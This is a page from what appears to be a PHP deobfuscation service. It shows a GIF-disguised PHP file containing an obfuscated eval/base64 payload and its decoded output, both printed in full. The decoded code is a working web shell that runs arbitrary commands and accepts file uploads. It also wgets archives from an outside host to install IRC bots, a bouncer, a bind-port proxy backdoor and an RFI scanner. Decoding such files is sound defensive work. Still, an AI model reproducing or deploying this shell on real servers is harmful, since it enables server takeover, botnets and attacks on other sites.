Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a???????????!??????,???????D?;? <?php eval(gzinflate(base64_decode('1Vl7Uxs5Ev97qe..
Decoded Output download
?><html><head>
<style type="text/css">
<!--
body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
table { width:100%; }
table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
a { color:lightblue;text-decoration:none; }
a:active { color:#00FF00; }
a:link { color:#5B5BFF; }
a:hover { text-decoration:underline; }
a:visited { color:#99CCFF; }
input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }
input[type="submit"] { border:1px solid #000000; }
input[type="text"] { padding:3px;}
input,select,option,input[type="submit"]:hover { background-color:#333333; }
textarea { background-color:#000000; }
// -->
</style>
<title>GotakanCyber</title>
</head>
<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>
<hr noshade size=1>
Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>
<hr noshade size=1>
<?php
error_reporting(4);
$sh_mainurl = "http://www.bandarlampung.us/irc/";
$sh_sourcez = array(
"dQ99Sh" => array($sh_mainurl."readme.txt","kiddie.php"),
"dQBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
"Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
"BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),
"RFIScaN" => array($sh_mainurl."404.txt","error.txt"),
);
if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }
else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }
echo "Safe : $dsafe OS: ".info(php_uname())."<br>".
"Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".
"Userid : ".info(aJ99exec("id"))."<br>".
"IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".
"IP Anda : ".info($_SERVER["REMOTE_ADDR"])."<br>";
if (isset($_POST['dir'])) {
$dir = $_POST['dir'];
if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }
}
else { $dir = getcwd(); }
echo "Direktory: $dir ";
if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }
?>
<hr noshade size=1>
<center>
<textarea cols=130 rows=20>
<?php
if (empty($_POST['portpsy'])) { $portpsy = 27071; }
if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }
if (isset($_POST['bot1'])) {
$chan1 = $_POST['channel1'];
$sirc1 = $_POST['serverirc1'];
echo "Downloading Scanbot 1..
";
echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);
echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1
";
echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");
}
elseif (isset($_POST['psy'])) {
$portpsy = $_POST['portpsy'];
echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);
echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");
}
elseif (isset($_POST['egg'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['eggrun'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['bind'])) {
echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");
}
elseif (isset($_POST['cmd'])) {
$cmdtxt = $_POST['cmdtxt'];
$ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);
}
?>
</textarea>
</center>
<hr noshade size=1>
<!-- <form enctype="multipart/form-data" action="" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
UPLOAD File: <input name="file" type="file" />
<input type="submit" value="UPLOAD" />
</form> -->
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />
Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />
<input type="submit" value="Execute" name="cmd" /><br>
</form>
<!-- <hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />
<input type="submit" value="dQBNC" name="psy" />
<input type="submit" value="Elite Proxy" name="bind" />
</form> -->
<hr noshade size=1>
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
<strong>Install EggDrop : </strong><p>
File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />
Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />
Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />
IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />
Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />
Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />
<input type="submit" value="Install Eggdrop" name="egg" />
<input type="submit" value="Load Eggdrop" name="eggrun" />
</form>
<hr noshade size=1>
<hr noshade size=1>
<!-- <form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />
Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />
Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />
<input type="submit" value="RFIBotScaN" name="bot1" />
</form> -->
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>
<?php
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }
else { echo '<b>Upload FAILED!!!</b><br><br>'; }
}
?>
<?php
function info($txt){ return "<font color=lime>".$txt."</font>"; }
###########################
## aJ99Sh CORE FUNCTIONS ##
###########################
function safemode() {
if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
else { return FALSE; }
}
function getdisfunc() {
$disfunc = @ini_get("disable_functions");
if (!empty($disfunc)) {
$disfunc = str_replace(" ","",$disfunc);
$disfunc = explode(",",$disfunc);
}
else { $disfunc= array(); }
return $disfunc;
}
function enabled($func) {
if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
else { return FALSE; }
}
function aJ99exec($cmd) {
$output = "";
if ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("
",$o); }
elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
else { $output = "NULL"; }
return $output;
}
function aJ99exec2($cmd) {
$output = "";
if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("
",$o); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
return $output;
}
die();
?><?Did this file decode correctly?
Original Code
GIF89a???????????!??????,???????D?;?
<?php
eval(gzinflate(base64_decode('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')));
?> Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | 5835f84e2ed0b7c4303c5d7d176d946c |
| Eval Count | 1 |
| Decode Time | 87 ms |